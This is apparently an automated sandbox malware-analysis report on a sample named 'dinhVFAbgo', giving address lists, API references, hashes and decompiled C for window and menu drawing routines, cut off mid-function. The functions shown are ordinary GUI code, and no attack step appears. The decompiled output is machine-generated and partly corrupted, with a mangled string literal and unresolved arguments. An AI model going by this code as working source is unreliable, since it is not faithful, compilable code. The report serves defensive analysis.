0x00cbaafd
0x00cbab39
0x00cbab39
0x00cbab39
0x00cbab47
0x00cbab4a
0x00cbab0f
0x00cbab15
0x00cbab22
0x00cbab2e
0x00cbab31
0x00cbab31
0x00cbab50
0x00cbab59
0x00cbab5c
0x00cbab65
0x00cbab6e
0x00cbab76
0x00cbab7e
0x00cbab85
0x00cbab94
0x00cbab97
0x00cbab9e
0x00cbabaf
0x00cbabc2
0x00cbabca
0x00cbabd6
0x00cbabdb
0x00cbabe5
0x00cbabe8
0x00cbaca0
0x00cbacaa
0x00cbacaf
0x00cbacb7
0x00cbacbc
0x00cbacbf
0x00cbacc1
0x00cbad82
0x00cbad86
0x00cbad88
0x00cbad8a
0x00cbad96
0x00cbad98
0x00cbada7
0x00cbadae
0x00cbadb8
0x00cbadb8
0x00cbad8a
0x00cbadbd
0x00cbadc1
0x00000000
0x00cbadc3
0x00cbadcd
0x00cbadd5
0x00cbadd9
0x00cbaddb
0x00000000
0x00cbaddb
0x00cbadc1
0x00cbaccb
0x00cbacd7
0x00cbacdf
0x00cbace5
0x00cbacea
0x00cbacee
0x00cbacff
0x00cbad09
0x00cbad0f
0x00cbad1a
0x00cbad2c
0x00cbad36
0x00cbad42
0x00cbad4a
0x00cbad5a
0x00cbad63
0x00cbad74
0x00cbad7a
0x00cbad7a
0x00000000
0x00cbabee
0x00cbabf6
0x00cbac04
0x00cbac0d
0x00cbac14
0x00cbac1d
0x00cbac2f
0x00cbac31
0x00cbac40
0x00cbac51
0x00cbac51
0x00cbac5a
0x00cbae29
0x00cbae2d
0x00cbaef1
0x00cbaefb
0x00cbaf03
0x00cbaf16
0x00cbaf20
0x00cbaf20
0x00cbae33
0x00cbae37
0x00cbae41
0x00cbae45
0x00cbae48
0x00cbae4a
0x00cbae5e
0x00cbae60
0x00cbae76
0x00cbae79
0x00cbae7c
0x00cbae81
0x00cbae83
0x00cbae92
0x00cbae97
0x00cbae9b
0x00cbae9d
0x00cbae9d
0x00cbae9d
0x00cbaea4
0x00cbaeb1
0x00cbaed0
0x00cbaed9
0x00cbaee1
0x00cbaee5
0x00cbaeec
0x00000000
0x00cbaeec
0x00cbae62
0x00cbae67
0x00cbae6d
0x00cbae6e
0x00cbae6f
0x00cbae59
0x00cbae59
0x00000000
0x00cbae59
0x00cbae4c
0x00cbae52
0x00cbae53
0x00cbae54
0x00000000
0x00cbac60
0x00cbac70
0x00cbac78
0x00cbac83
0x00cbac86
0x00cbac90
0x00cbadde
0x00cbadde
0x00cbade4
0x00cbade7
0x00cbadef
0x00cbadfa
0x00cbae05
0x00cbae13
0x00cbae23
0x00000000
0x00cbae23
0x00cbac88
0x00000000
0x00cbac88
0x00cbac5a

APIs

__EH_prolog3_GS.LIBCMT ref: 00CBAA23

Part of subcall function 00CA2ABC: __EH_prolog3.LIBCMT ref: 00CA2AC3

GetMenuItemInfoA.USER32 ref: 00CBAA9B
GetMenuItemInfoA.USER32 ref: 00CBAACE
CopyRect.USER32 ref: 00CBAAF5
GetObjectA.GDI32(?,00000018,?), ref: 00CBAB22
GetSystemMetrics.USER32 ref: 00CBAB3F
GetSystemMetrics.USER32 ref: 00CBAB4A
GetSysColor.USER32(00000004), ref: 00CBAB88
CreateCompatibleDC.GDI32(00000000), ref: 00CBABA2
CopyRect.USER32 ref: 00CBABF6
GetSysColor.USER32(0000000D), ref: 00CBAC07
GetSysColor.USER32(00000010), ref: 00CBAC27
GetSysColor.USER32(00000014), ref: 00CBAC31
GetSysColor.USER32(0000000D), ref: 00CBAC67
GetSysColor.USER32(00000007), ref: 00CBADDE
ExtTextOutA.GDI32(00000001,?,?,00000002,00000000,?,?,00000000), ref: 00CBAE23
CreateCompatibleDC.GDI32(00000000), ref: 00CBAE88
InflateRect.USER32(00000000,000000FF,000000FF), ref: 00CBAEB1
BitBlt.GDI32(00000003,00000000,?,?,?,?,00000000,00000000,00CC0020), ref: 00CBAED0

Strings

@, xrefs: 00CBAA88

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Color$Rect$CompatibleCopyCreateInfoItemMenuMetricsSystem$H_prolog3H_prolog3_InflateObjectText
String ID: @
API String ID: 364174344-2766056989
Opcode ID: 4b054bbb4dbcf37ec1842b28287b1632e71b0980c61825a4e45c6c38bdac19fd
Instruction ID: 3b9d836cb4ed693834830e457e245d8ff75e097c7998976cb31534dd1cfbf13b
Opcode Fuzzy Hash: 4b054bbb4dbcf37ec1842b28287b1632e71b0980c61825a4e45c6c38bdac19fd
Instruction Fuzzy Hash: BBF13571A002189FDF14DFA8CC89BEDBBB5FF48704F148159E956BB291CB70AA09CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00D169B0 Relevance: 40.8, APIs: 27, Instructions: 337
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E00D169B0(intOrPtr* __ecx, void* __edx, void* __edi, RECT* _a4) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				struct tagRECT _v72;
				struct tagRECT _v88;
				struct tagRECT _v104;
				struct tagRECT _v120;
				struct tagRECT _v136;
				struct tagRECT _v152;
				RECT* _v156;
				struct tagRECT* _v160;
				signed int _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				void* __ebx;
				void* __esi;
				signed int _t140;
				signed int _t144;
				RECT* _t148;
				signed int _t150;
				long _t151;
				intOrPtr _t154;
				intOrPtr* _t245;
				void* _t250;
				void* _t251;
				intOrPtr* _t255;
				intOrPtr _t257;
				intOrPtr _t262;
				struct tagRECT* _t267;
				intOrPtr _t272;
				signed int _t274;
				void* _t284;

				_t259 = __edi;
				_t258 = __edx;
				_t140 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t140 ^ _t274;
				_t142 = _a4;
				_t245 = __ecx;
				_v156 = _a4;
				_t267 = 0;
				if( *((intOrPtr*)(__ecx + 0x105c)) > 0) {
					_t142 = E00CB2C35(__ecx, __ecx, __edx, __edi);
					_v160 = _t142;
					if(_t142 != 0 &&  *((intOrPtr*)(_t142 + 0x20)) != 0) {
						_push(__edi);
						_t144 = E00CB7738(__ecx);
						_v24.left = 0;
						_v164 = _t144 & 0x00400000;
						_v24.top = 0;
						_v24.right = 0;
						_v24.bottom = 0;
						GetClientRect( *(_t245 + 0x20),  &_v24);
						_t148 = _v156;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						if(_t148 == 0) {
							L13:
							_t267 = 0;
							_v120.left = 0;
							_v120.top = 0;
							_v120.right = 0;
							_v120.bottom = 0;
							_t150 = GetWindowRect( *(_t245 + 0x20),  &_v120);
							_t284 =  *0xe68578 - _t267; // 0x1
							if(_t284 != 0) {
								L15:
								_t262 =  *((intOrPtr*)(_t245 + 0x105c));
								_t250 = _t245 + 0x1060;
								_v168 = _t262;
								 *((intOrPtr*)(_t245 + 0x105c)) = _t267;
								if(_t250 != 0 &&  *((intOrPtr*)(_t250 + 4)) != _t267) {
									_t150 = E00CB9CCD(_t250);
								}
								_t251 = _t245 + 0x1068;
								if(_t251 != 0 &&  *((intOrPtr*)(_t251 + 4)) != _t267) {
									_t150 = E00CB9CCD(_t251);
								}
								_t151 = _t150 | 0xffffffff;
								_v156 = 0x41c;
								_v104.left = _t151;
								_v104.top = _t151;
								_v104.right = _t151;
								_v104.bottom = _t151;
								 *0xe17a64();
								_t154 =  *((intOrPtr*)( *((intOrPtr*)( *_t245 + 0x1c8))))();
								_v172 = _t154;
								 *(_t154 + 0xbdc) = 1;
								if(_v164 == 0) {
									_push(0x41e);
									_v156 = 0x41e;
									_push(_v24.bottom - _v24.top - _t262);
									_push(_v24.right - _v24.left - _t262);
									_push(0xffffffff);
									_push(0xffffffff);
								} else {
									GetWindowRect( *(_t245 + 0x20),  &_v104);
									_push(0x41c);
									_push(_v24.bottom - _v24.top - _t262);
									_push(_v24.right - _v24.left - _t262);
									_push(_v104.top);
									_push(_v104.left + _t262);
								}
								_push(0);
								E00CB7A83(_t245);
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								if(IsRectEmpty( &_v56) == 0) {
									_t272 = _v160;
									MapWindowPoints( *(_t245 + 0x20),  *(_t272 + 0x20),  &_v136, 2);
									RedrawWindow( *(_t272 + 0x20),  &_v136, 0, 0x185);
								}
								_t267 =  &_v72;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								if(IsRectEmpty( &_v72) == 0 && EqualRect( &_v56,  &_v72) == 0) {
									_t267 = _v160;
									MapWindowPoints( *(_t245 + 0x20),  *(_t267 + 0x20),  &_v136, 2);
									RedrawWindow( *(_t267 + 0x20),  &_v136, 0, 0x185);
								}
								UpdateWindow( *(_v160 + 0x20));
								_t255 = _t245;
								_push(_v156);
								 *((intOrPtr*)(_t245 + 0x105c)) = _v168;
								_push(_v24.bottom - _v24.top);
								_push(_v24.right - _v24.left);
								if(_v164 == 0) {
									_push(0xffffffff);
									_push(0xffffffff);
								} else {
									_push(_v104.top);
									_push(_v104.left);
								}
								_push(0);
								E00CB7A83(_t255);
								if(IsRectEmpty( &_v56) == 0) {
									InvalidateRect( *(_t245 + 0x20),  &_v56, 1);
								}
								if(IsRectEmpty( &_v72) == 0 && EqualRect( &_v56,  &_v72) == 0) {
									InvalidateRect( *(_t245 + 0x20),  &_v72, 1);
								}
								UpdateWindow( *(_t245 + 0x20));
								 *(_v172 + 0xbdc) =  *(_v172 + 0xbdc) & 0x00000000;
							} else {
								_v40.left = 0;
								_v40.top = 0;
								_v40.right = 0;
								_v40.bottom = 0;
								GetWindowRect( *(_v160 + 0x20),  &_v40);
								_v88.left = 0;
								_v88.top = 0;
								_v88.right = 0;
								_v88.bottom = 0;
								UnionRect( &_v88,  &_v120,  &_v40);
								if(EqualRect( &_v88,  &_v40) != 0) {
									goto L15;
								}
							}
						} else {
							CopyRect( &_v40, _t148);
							E00CBA172(_t245,  &_v40);
							_t257 =  *((intOrPtr*)(_t245 + 0x105c));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							if(_v164 == 0) {
								_v88.left = _v24.right - _t257 - 1;
							} else {
								_v88.right = _v24.left + 1 + _t257;
							}
							if(IntersectRect( &_v56,  &_v40,  &_v88) == 0) {
								SetRectEmpty( &_v56);
							}
							_t267 =  &_v24;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_v152.top = _v24.bottom -  *((intOrPtr*)(_t245 + 0x105c)) - 1;
							if(IntersectRect( &_v72,  &_v40,  &_v152) == 0) {
								SetRectEmpty( &_v72);
							}
							if(IsRectEmpty( &_v56) == 0 || IsRectEmpty( &_v72) == 0) {
								goto L13;
							}
						}
						_pop(_t259);
					}
				}
				return E00DDCBCE(_t142, _t245, _v8 ^ _t274, _t258, _t259, _t267);
			}

0x00d169b0
0x00d169b0
0x00d169b9
0x00d169c0
0x00d169c3
0x00d169c7
0x00d169c9
0x00d169d0
0x00d169d8
0x00d169de
0x00d169e3
0x00d169eb
0x00d169fa
0x00d169fd
0x00d16a07
0x00d16a0a
0x00d16a17
0x00d16a1a
0x00d16a1d
0x00d16a20
0x00d16a29
0x00d16a32
0x00d16a33
0x00d16a34
0x00d16a35
0x00d16a3c
0x00d16a3d
0x00d16a3e
0x00d16a3f
0x00d16a42
0x00d16b0b
0x00d16b0e
0x00d16b14
0x00d16b17
0x00d16b1a
0x00d16b1d
0x00d16b20
0x00d16b26
0x00d16b2c
0x00d16b81
0x00d16b81
0x00d16b87
0x00d16b8d
0x00d16b93
0x00d16b9b
0x00d16ba2
0x00d16ba2
0x00d16ba7
0x00d16baf
0x00d16bb6
0x00d16bb6
0x00d16bbb
0x00d16bbe
0x00d16bc8
0x00d16bcb
0x00d16bce
0x00d16bd1
0x00d16bde
0x00d16be6
0x00d16bef
0x00d16bf5
0x00d16bff
0x00d16c35
0x00d16c36
0x00d16c44
0x00d16c4d
0x00d16c4e
0x00d16c50
0x00d16c01
0x00d16c08
0x00d16c16
0x00d16c1b
0x00d16c24
0x00d16c28
0x00d16c2d
0x00d16c2d
0x00d16c52
0x00d16c56
0x00d16c64
0x00d16c69
0x00d16c6a
0x00d16c6b
0x00d16c74
0x00d16c76
0x00d16c8b
0x00d16ca2
0x00d16ca2
0x00d16ca8
0x00d16cb1
0x00d16cb6
0x00d16cb7
0x00d16cb8
0x00d16cc1
0x00d16cd5
0x00d16cea
0x00d16d01
0x00d16d01
0x00d16d10
0x00d16d1c
0x00d16d1e
0x00d16d24
0x00d16d30
0x00d16d3e
0x00d16d3f
0x00d16d49
0x00d16d4b
0x00d16d41
0x00d16d41
0x00d16d44
0x00d16d44
0x00d16d4d
0x00d16d4f
0x00d16d60
0x00d16d6b
0x00d16d6b
0x00d16d7d
0x00d16d9a
0x00d16d9a
0x00d16da3
0x00d16daf
0x00d16b2e
0x00d16b31
0x00d16b3b
0x00d16b3e
0x00d16b41
0x00d16b47
0x00d16b50
0x00d16b57
0x00d16b5e
0x00d16b62
0x00d16b65
0x00d16b7b
0x00000000
0x00000000
0x00d16b7b
0x00d16a48
0x00d16a4d
0x00d16a59
0x00d16a68
0x00d16a71
0x00d16a72
0x00d16a73
0x00d16a74
0x00d16a75
0x00d16a88
0x00d16a77
0x00d16a7d
0x00d16a7d
0x00d16a9f
0x00d16aa5
0x00d16aa5
0x00d16aae
0x00d16abd
0x00d16abf
0x00d16ac0
0x00d16ac1
0x00d16ac2
0x00d16adf
0x00d16ae5
0x00d16ae5
0x00d16af7
0x00000000
0x00000000
0x00d16af7
0x00d16db6
0x00d16db6
0x00d169eb
0x00d16dc4

APIs

Part of subcall function 00CB7738: GetWindowLongA.USER32 ref: 00CB7745

GetClientRect.USER32(?,?), ref: 00D16A20
CopyRect.USER32 ref: 00D16A4D

Part of subcall function 00CBA172: ScreenToClient.USER32 ref: 00CBA181
Part of subcall function 00CBA172: ScreenToClient.USER32 ref: 00CBA18E

IntersectRect.USER32 ref: 00D16A97
SetRectEmpty.USER32(?), ref: 00D16AA5
IntersectRect.USER32 ref: 00D16AD7
SetRectEmpty.USER32(?), ref: 00D16AE5
IsRectEmpty.USER32 ref: 00D16AEF
IsRectEmpty.USER32 ref: 00D16AFD
GetWindowRect.USER32 ref: 00D16B20
GetWindowRect.USER32 ref: 00D16B47
UnionRect.USER32 ref: 00D16B65
EqualRect.USER32 ref: 00D16B73
GetWindowRect.USER32 ref: 00D16C08
IsRectEmpty.USER32 ref: 00D16C6C
MapWindowPoints.USER32 ref: 00D16C8B
RedrawWindow.USER32(?,?,00000000,00000185), ref: 00D16CA2
IsRectEmpty.USER32 ref: 00D16CB9
EqualRect.USER32 ref: 00D16CCB
MapWindowPoints.USER32 ref: 00D16CEA
RedrawWindow.USER32(?,?,00000000,00000185), ref: 00D16D01
UpdateWindow.USER32(?), ref: 00D16D10
IsRectEmpty.USER32 ref: 00D16D58
InvalidateRect.USER32(?,?,00000001), ref: 00D16D6B
IsRectEmpty.USER32 ref: 00D16D75
EqualRect.USER32 ref: 00D16D87
InvalidateRect.USER32(?,?,00000001), ref: 00D16D9A
UpdateWindow.USER32(?), ref: 00D16DA3

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Window$Empty$ClientEqual$IntersectInvalidatePointsRedrawScreenUpdate$CopyLongUnion
String ID:
API String ID: 4119827998-0
Opcode ID: 4edf9c048b6879d4bd2bfb1abef6dec89efb939b85d8154cc2dca4a6361106a9
Instruction ID: c3c0f69e8585c4c08a13709f50b46ac89accfdd6c10f179ff99bb8d7e4678476
Opcode Fuzzy Hash: 4edf9c048b6879d4bd2bfb1abef6dec89efb939b85d8154cc2dca4a6361106a9
Instruction Fuzzy Hash: F0D1F771904219AFCF10CFA5D984ADEBBB9FF08701F1441A6E949FA251DB70AA85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D06272 Relevance: 39.0, APIs: 20, Strings: 2, Instructions: 494
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00D06272(void* __ebx, signed int __ecx, void* __edi, void* __esi, signed int _a4, int _a8, int _a12, int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				struct tagRECT _v36;
				int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				struct tagMENUITEMINFOA _v104;
				int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				long _t150;
				signed int _t163;
				signed int _t176;
				signed int _t178;
				RECT* _t185;
				signed int _t193;
				int _t194;
				signed int _t199;
				signed int _t200;
				signed int _t205;
				signed int _t214;
				signed int _t215;
				int _t216;
				signed int _t231;
				signed int _t235;
				struct HWND__* _t237;
				int _t241;
				void* _t247;
				intOrPtr* _t249;
				signed int _t251;
				signed int _t254;
				void* _t259;
				signed int _t270;
				signed int _t271;
				signed int _t298;
				struct HWND__* _t312;
				struct HWND__* _t314;
				signed int _t315;
				void* _t320;
				signed int _t321;
				signed int _t326;
				struct HMENU__* _t328;

				_push(__ecx);
				_push(__ebx);
				_push(__esi);
				_t318 = __ecx;
				_t254 = 1;
				_v8 = 1;
				_t249 =  *((intOrPtr*)(__ecx + 0x2a00));
				if(_t249 == 0) {
					L26:
					return _t134;
				} else {
					_t312 = 0;
					_push(__edi);
					while(1) {
						_t314 =  *(_t249 + 8);
						_t249 =  *_t249;
						if(_t314 == 0) {
							break;
						}
						if( *((intOrPtr*)(_t318 + 0x268)) == _t312 ||  *((intOrPtr*)(_t318 + 0x28c)) != _t312) {
							_t237 = _t312;
						} else {
							_t237 = 1;
						}
						if(_a20 != 0) {
							L23:
							SetWindowPos(_t314, _t312, _t312, _t312, _t312, _t312, 0x14);
						} else {
							if(_t237 != 0) {
								L11:
								if( *((intOrPtr*)(_t318 + 0x290)) == _t312 || _t254 == 0) {
									_t241 = _a4;
									if( *((intOrPtr*)(_t318 + 0x254)) != _t312 ||  *((intOrPtr*)(_t318 + 0x258)) != _t312 ||  *((intOrPtr*)(_t318 + 0x25c)) != _t312) {
										if(_t254 != 0) {
											_t241 =  *((intOrPtr*)(_t318 + 0x2dc)) - _a12 - 1;
										}
									}
									SetWindowPos(_t314, _t312, _t241, _a8, _a12, _a16, 0x14);
									if( *((intOrPtr*)(_t318 + 0x254)) != 0 ||  *((intOrPtr*)(_t318 + 0x258)) != 0 ||  *((intOrPtr*)(_t318 + 0x25c)) != 0) {
										if(_v8 == 0) {
											goto L22;
										}
									} else {
										L22:
										_a4 = _a4 + _a12 + _a24;
									}
								} else {
									goto L23;
								}
							} else {
								_t247 = _t318 + 0x2250;
								if(_t247 == 0 || _t314 !=  *((intOrPtr*)(_t247 + 0x20))) {
									goto L11;
								} else {
									goto L23;
								}
							}
						}
						InvalidateRect(_t314, 0, 1);
						_t134 = UpdateWindow(_t314);
						_t312 = 0;
						_t254 = 0;
						_v8 = 0;
						if(_t249 != 0) {
							continue;
						} else {
							goto L26;
						}
						goto L99;
					}
					E00CAA4E7(_t249, _t254, _t314, _t318, __eflags);
					asm("int3");
					_push(0x58);
					E00DDD55F(0xe0c1a4, _t249, _t314, _t318);
					_t315 = _t254;
					_t251 = _a4;
					__eflags = _t251;
					if(_t251 < 0) {
						L51:
						__eflags = 0;
					} else {
						__eflags = _t251 -  *((intOrPtr*)(_t315 + 0xbc));
						if(_t251 >=  *((intOrPtr*)(_t315 + 0xbc))) {
							goto L51;
						} else {
							__eflags = _t251 -  *((intOrPtr*)(_t315 + 0x9c));
							if(_t251 >=  *((intOrPtr*)(_t315 + 0x9c))) {
								goto L51;
							} else {
								_t140 =  *(_t315 + 0xc0);
								_t320 =  *_t315;
								_v52 = _t140;
								__eflags = _t140 - _t251;
								if(_t140 != _t251) {
									_t318 =  *((intOrPtr*)(_t320 + 0x274));
									 *0xe17a64(_t251);
									_t142 =  *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x274))))();
									__eflags = _t142;
									if(_t142 != 0) {
										goto L51;
									} else {
										_t144 = E00CACA6C(0xe283a8, E00CB2A08(_t315));
										_t321 = 0;
										_v48 = 0;
										_pop(_t259);
										__eflags = _t144;
										if(_t144 != 0) {
											__eflags =  *(_t315 + 0x138);
											if( *(_t315 + 0x138) != 0) {
												__eflags =  *(_t144 + 0x154);
												if( *(_t144 + 0x154) != 0) {
													L40:
													_t321 = 0;
													__eflags = 0;
												} else {
													__eflags =  *0xe686fc - _t321; // 0x1
													if(__eflags != 0) {
														goto L40;
													} else {
														_t321 = 1;
													}
												}
												_v48 = _t321;
											}
										}
										_t146 = E00CB277F(_t251, _t259, _t312, GetParent( *(_t315 + 0x20)));
										__eflags =  *((intOrPtr*)(_t315 + 0xbc)) - 1;
										_v44 = _t146;
										if( *((intOrPtr*)(_t315 + 0xbc)) > 1) {
											__eflags = _t321;
											if(_t321 != 0) {
												SendMessageA( *(_t146 + 0x20), 0xb, 0, 0);
											}
										}
										__eflags =  *(_t315 + 0xc0) - 0xffffffff;
										if( *(_t315 + 0xc0) != 0xffffffff) {
											__eflags =  *(_t315 + 0x120);
											if( *(_t315 + 0x120) != 0) {
												 *0xe17a64();
												_t231 =  *((intOrPtr*)( *((intOrPtr*)( *_t315 + 0x210))))();
												__eflags = _t231;
												if(_t231 != 0) {
													E00CB7B32(_t231, 0);
												}
											}
										}
										 *(_t315 + 0xc0) = _t251;
										E00D031A2(_t315);
										 *0xe17a64();
										_t150 =  *((intOrPtr*)( *((intOrPtr*)( *_t315 + 0x210))))();
										_t251 = _t150;
										_v56 = _t251;
										__eflags = _t251;
										if(_t251 != 0) {
											E00CB7B32(_t251, 5);
											__eflags =  *(_t315 + 0x120);
											if( *(_t315 + 0x120) == 0) {
												BringWindowToTop( *(_t251 + 0x20));
											}
											__eflags =  *(_t315 + 0x274);
											if( *(_t315 + 0x274) != 0) {
												E00CB7A83(_t251, 0, 0xffffffff, 0xffffffff,  *((intOrPtr*)(_t315 + 0x2f4)) -  *((intOrPtr*)(_t315 + 0x2ec)) + 1,  *((intOrPtr*)(_t315 + 0x2f8)) -  *((intOrPtr*)(_t315 + 0x2f0)), 0x16);
												__eflags =  *((intOrPtr*)(_t315 + 0x2f4)) -  *((intOrPtr*)(_t315 + 0x2ec));
												E00CB7A83(_t251, 0, 0xffffffff, 0xffffffff,  *((intOrPtr*)(_t315 + 0x2f4)) -  *((intOrPtr*)(_t315 + 0x2ec)),  *((intOrPtr*)(_t315 + 0x2f8)) -  *((intOrPtr*)(_t315 + 0x2f0)), 0x16);
											}
											 *0xe17a64( *(_t315 + 0xc0));
											_t265 = _t315;
											 *((intOrPtr*)( *((intOrPtr*)( *_t315 + 0x224))))();
											__eflags =  *(_t315 + 0x250);
											if( *(_t315 + 0x250) != 0) {
												_t265 = _t315;
												E00D06BC8(_t315, _t312, _t315, 0);
											}
											_t251 = E00CACA6C(0xe68774, E00CB277F(_t251, _t265, _t312, GetParent( *(_t315 + 0x20))));
											_pop(_t267);
											__eflags = _t251;
											if(_t251 != 0) {
												 *0xe17a64();
												_t267 = _t251;
												_t205 =  *((intOrPtr*)( *((intOrPtr*)( *_t251 + 0x3e4))))();
												__eflags = _t205;
												if(_t205 != 0) {
													E00CA67E1( &_v40);
													_v8 = _v8 & 0x00000000;
													 *0xe17a64( *(_t315 + 0xc0),  &_v40);
													 *((intOrPtr*)( *((intOrPtr*)( *_t315 + 0x1bc))))();
													E00CB7AE0(_t251, _v40);
													 *0xe17a64();
													_t298 = _t251;
													_t214 =  *((intOrPtr*)( *((intOrPtr*)( *_t251 + 0x168))))();
													__eflags = _t214;
													if(_t214 != 0) {
														_t215 = _t251;
														goto L65;
													} else {
														_t216 = E00CB277F(_t251, _t298, _t312, GetParent( *(_t251 + 0x20)));
														__eflags = _t216;
														if(_t216 != 0) {
															L65:
															_t216 = RedrawWindow( *(_t215 + 0x20), 0, 0, 0x401);
														}
													}
													_t79 =  &_v8;
													 *_t79 = _v8 | 0xffffffff;
													__eflags =  *_t79;
													_t267 = _v40 - 0x10;
													E00CA2975(_t216, _v40 - 0x10);
												}
											}
											__eflags =  *(_t315 + 0x288);
											if( *(_t315 + 0x288) != 0) {
												L69:
												 *0xe17a64();
												_t267 = _t315;
												 *((intOrPtr*)( *((intOrPtr*)( *_t315 + 0x184))))();
											} else {
												__eflags =  *(_t315 + 0x28c);
												if( *(_t315 + 0x28c) != 0) {
													goto L69;
												}
											}
											InvalidateRect( *(_t315 + 0x20), 0, 1);
											UpdateWindow( *(_t315 + 0x20));
											__eflags = _v52 - 0xffffffff;
											_t326 = _v56;
											if(_v52 != 0xffffffff) {
												_t200 = E00CACA6C("0?\xef\xbf\xbd",												_v52 = _t200;
												_pop(_t267);
												__eflags = _t200;
												if(_t200 == 0) {
													__eflags =  *0xe6847c;
													if( *0xe6847c != 0) {
														_t267 = _t326;
														E00CB7A0A(_t251, _t326, _t312);
													}
												} else {
													_t267 = E00CD8851(_t312, _t200);
													E00D1A258(_t202, _v52, 1);
												}
											}
											_t163 = _t315 + 0x2250;
											__eflags = _t163;
											if(_t163 != 0) {
												__eflags =  *(_t163 + 0x20);
												if(__eflags != 0) {
													_v40 = 1;
													_t193 = E00CBAF23(_t251, _t267, _t312, _t315, _t326, __eflags, GetSystemMenu( *(_t326 + 0x20), 0));
													__eflags = _t193;
													if(_t193 == 0) {
														L82:
														_t194 = _v40;
													} else {
														_t328 =  *(_t193 + 4);
														__eflags = _t328;
														if(_t328 == 0) {
															goto L82;
														} else {
															E00DDFBE0(_t315,  &_v104, 0, 0x30);
															_v104.cbSize = 0x30;
															_v104.fMask = 1;
															_t199 = GetMenuItemInfoA(_t328, 0xf060, 0,  &_v104);
															__eflags = _t199;
															if(_t199 == 0) {
																L81:
																_t194 = 0;
															} else {
																__eflags = _v104.fState & 0x00000003;
																if((_v104.fState & 0x00000003) == 0) {
																	goto L82;
																} else {
																	goto L81;
																}
															}
														}
													}
													E00CB7654(_t315 + 0x2250, _t194);
												}
											}
											_t318 =  *((intOrPtr*)( *_t315 + 0x270));
											 *0xe17a64( *(_t315 + 0xc0));
											_t270 = _t315;
											 *((intOrPtr*)( *((intOrPtr*)( *_t315 + 0x270))))();
											__eflags =  *((intOrPtr*)(_t315 + 0xbc)) - 1;
											if( *((intOrPtr*)(_t315 + 0xbc)) > 1) {
												__eflags = _v48;
												if(_v48 != 0) {
													_t318 = _v44;
													SendMessageA( *(_t318 + 0x20), 0xb, 1, 0);
													_t185 = 0;
													__eflags =  *(_t315 + 0x1f0);
													if( *(_t315 + 0x1f0) == 0) {
														_push(0x185);
														_push(0);
													} else {
														_v36.left = 0;
														_v36.top = 0;
														_v36.right = 0;
														_v36.bottom = 0;
														GetWindowRect( *(_t315 + 0x20),  &_v36);
														E00CBA172(E00CB277F(_t251, _t270, _t312, GetParent( *(_t315 + 0x20))),  &_v36);
														_push(0x185);
														_push(0);
														_t185 =  &_v36;
													}
													RedrawWindow( *(_t318 + 0x20), _t185, ??, ??);
												}
											}
											_t271 =  *(_t315 + 0xc0);
											__eflags = _t271 - 0xffffffff;
											if(_t271 == 0xffffffff) {
												goto L33;
											} else {
												__eflags = _t251;
												if(_t251 == 0) {
													goto L33;
												} else {
													_t318 =  *((intOrPtr*)( *_t315 + 0x1b0));
													 *0xe17a64(_t271);
													_t315 = E00CACA6C(0xe1f3d8,  *((intOrPtr*)( *((intOrPtr*)( *_t315 + 0x1b0))))());
													_v44 = _t315;
													__eflags = _t315;
													if(_t315 == 0) {
														goto L33;
													} else {
														 *0xe17a64(0);
														_t315 =  *((intOrPtr*)( *((intOrPtr*)( *_t315 + 0x228))))();
														_t318 =  *((intOrPtr*)( *_v44 + 0x1c4));
														 *0xe17a64();
														_t176 =  *((intOrPtr*)( *((intOrPtr*)( *_v44 + 0x1c4))))();
														__eflags = _t176 & 0x00000010;
														_t178 =  *(_t251 + 0xa0);
														if((_t176 & 0x00000010) == 0) {
															 *(_t251 + 0xa0) = _t178 & 0xffffffef;
															__eflags = _t315;
															if(_t315 == 0) {
																goto L33;
															} else {
																_t318 =  *((intOrPtr*)( *_t315 + 0x1f8));
																goto L98;
															}
														} else {
															 *(_t251 + 0xa0) = _t178 | 0x00000010;
